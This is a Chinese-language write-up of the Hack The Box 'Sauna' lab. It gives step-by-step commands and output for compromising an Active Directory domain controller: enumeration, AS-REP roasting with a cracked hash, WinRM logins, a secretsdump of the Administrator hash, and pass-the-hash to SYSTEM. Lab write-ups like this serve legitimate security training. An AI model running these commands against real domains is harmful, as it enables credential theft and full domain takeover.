目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
将靶机TCP开放端口号提取并保存
使用nmap对靶机TCP开放端口进行脚本、服务扫描
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
使用nmap对靶机常用UDP端口进行开放扫描
使用nmap对靶机UDP开放端口进行脚本、服务扫描
使用gobuster对靶机进行路径FUZZ
使用gobuster对靶机子域名进行爆破查询
使用username-anarchy对该名单进行简单处理
使用smbclient列出靶机SMB共享
使用netexec通过靶机LDAP服务枚举靶机域内用户
边界突破
使用kerbrute通过上述处理好的名单枚举靶机域内用户
使用impacket-GetNPUsers尝试无认证获取该用户TGT
使用john尝试破解该哈希值
使用netexec通过靶机LDAP服务枚举域内用户
使用smbmap枚举靶机SMB共享
使用evil-winrm通过上述凭证登录靶机Win-RM服务
横向移动
使用winpeas枚举靶机系统
查看靶机系统用户
使用evil-winrm通过上述凭证登录靶机Win-RM服务
权限提升
尝试使用impacket-secretsdump提取域控中的哈希密码
此处取后半段的NTLM哈希可以直接通过evil-winrm登录
使用impacket-psexec直接提权至SYSTEM用户
连接至HTB服务器并启动靶机
靶机IP:10.10.10.175
分配IP:10.10.16.21
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.10.175 -r 1-65535 --ulimit 5000 | tee res
将靶机TCP开放端口号提取并保存
ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# grep ^[0-9] res | cut -d/ -f1 | paste -sd,
53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49673,49674,49676,49689,49697
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep ^[0-9] res | cut -d/ -f1 | paste -sd,)
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49673,49674,49676,49689,49697
使用nmap对靶机TCP开放端口进行脚本、服务扫描
nmap -sT -p$ports -sCV -Pn 10.10.10.175
- 需要重点关注的服务和信息
53端口:DNS服务
80端口:HTTP服务(Microsoft-IIS/10.0)
88端口:Kerberos服务
389端口:LDAP服务
445端口:SMB服务(SMB2)
5985端口:Win-RM服务
Domain:EGOTISTICAL-BANK.LOCAL
使用nmap对靶机TCP开放端口进行漏洞、系统扫描
nmap -sT -p$ports --script=vuln -O -Pn 10.10.10.175
使用nmap对靶机常用UDP端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.175
使用nmap对靶机UDP开放端口进行脚本、服务扫描
nmap -sU -p53,123 -sCV -Pn 10.10.10.175
使用gobuster对靶机进行路径FUZZ
gobuster dir -u http://sauna.htb -w ../dictionary/Entire-Dir.txt -x php,jsp,asp,aspx -t 200
使用gobuster对靶机子域名进行爆破查询
gobuster dns -d sauna.htb -w ../dictionary/subdomains-top20000.txt -t 50
- 翻了一圈靶机HTTP服务后,我没有发现任何交互点
- 点击About Us拉至页面最底部可以获得几个人名信息
- 将其提取出来
┌──(root㉿kali)-[/home/kali/Desktop/tool/username-anarchy]
└─# cat << EOF > names.txt
heredoc> Fergus Smith
Hugo Bear
Steven Kerb
Shaun Coins
Bowie Taylor
Sophie Driver
heredoc> EOF
使用username-anarchy对该名单进行简单处理
./username-anarchy -i names.txt > names_res.txt
使用smbclient列出靶机SMB共享
smbclient -L \\10.10.10.175
使用netexec通过靶机LDAP服务枚举靶机域内用户
netexec ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL --users
边界突破
使用kerbrute通过上述处理好的名单枚举靶机域内用户
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc 10.10.10.175 ./names_res.txt
使用impacket-GetNPUsers尝试无认证获取该用户TGT
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith -dc-ip 10.10.10.175 -no-pass
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:27de1b801864c58fa633cf353cb73fa9$700a291ac3d952433fd8f4a03bef742708d1cc661a4c6ae86c2c56a792d71282e766e4ea8436e5942ade82381c63bf0149faf494d74a45581184fe7d3bed143e1c5610f3d67d248b5bc8d0933b53f11d3b99f853da8690ed2665dc166838df952935f5a4621319ee243d605a405680488cf9a3361d626525d2b80dc1b819fe40e9b009495cd87b2ff75a8c4156f18e414d8c68cff8732e646bc2fb3ea929199f7abd8056648c93427883d2d484d1521b6cc169d13d8c158b27cfbce6123432d51e630949fd25492aac898723036f94fcb342aa9a72bf965c32afc7f900f620abc62e9a6af823f50aec67085745586cd2161b56a07e3eb33db177726fe803b9ed
使用john尝试破解该哈希值
john fsmith.hash --format=krb5asrep --wordlist=../dictionary/rockyou.txt
账户:fsmith
密码:Thestrokes23
使用netexec通过靶机LDAP服务枚举域内用户
netexec ldap 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' --users
使用smbmap枚举靶机SMB共享
smbmap -H 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
使用evil-winrm通过上述凭证登录靶机Win-RM服务
evil-winrm -i 10.10.10.175 -u 'fsmith' -p 'Thestrokes23'
- 在C:\Users\FSmith\Desktop目录下找到user.txt文件
横向移动
使用winpeas枚举靶机系统
查看靶机系统用户
net user
*Evil-WinRM* PS C:\Users\FSmith\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator FSmith Guest
HSmith krbtgt svc_loanmgr
The command completed with one or more errors.
- 看起来该账户应该是:svc_loanmgr
账户:svc_loanmgr
密码:Moneymakestheworldgoround!
使用evil-winrm通过上述凭证登录靶机Win-RM服务
evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
权限提升
尝试使用impacket-secretsdump提取域控中的哈希密码
impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
- 这里拿到了Administrator的哈希密码
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
此处取后半段的NTLM哈希可以直接通过evil-winrm登录
evil-winrm -i 10.10.10.175 -u 'Administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
使用impacket-psexec直接提权至SYSTEM用户
impacket-psexec EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
- 在C:\Users\Administrator\Desktop目录下找到root.txt文件